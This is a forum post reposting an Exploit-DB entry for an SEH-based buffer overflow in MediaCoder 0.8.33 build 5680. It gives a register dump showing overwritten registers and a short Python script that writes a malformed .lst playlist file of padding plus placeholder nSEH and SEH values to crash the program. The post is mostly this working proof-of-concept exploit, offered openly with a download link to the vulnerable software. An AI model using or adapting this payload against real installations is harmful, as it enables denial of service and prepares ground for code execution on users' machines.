Jump to content
KhiZaRix

Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow

Recommended Posts

# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst)

# Date: 11/29/2010

# Author: Hadji Samir s-dz@hotmail.fr

# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe

# Version: 0.8.33 build 5680

EAX 0012E788

ECX 43434343

EDX 00000000

EBX 43434343

ESP 0012E724

EBP 0012E774

ESI 0012E788

EDI 00000000

#!/usr/bin/python

buffer = ("http://" + "A" * 845)

nseh = ("B" * 4)

seh = ("C" * 4)

junk = ("D" * 60)

f= open("exploit.lst",'w')

f.write(buffer + nseh + seh + junk)

f.close()

Source: http://www.exploit-db.com/exploits/35531/

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...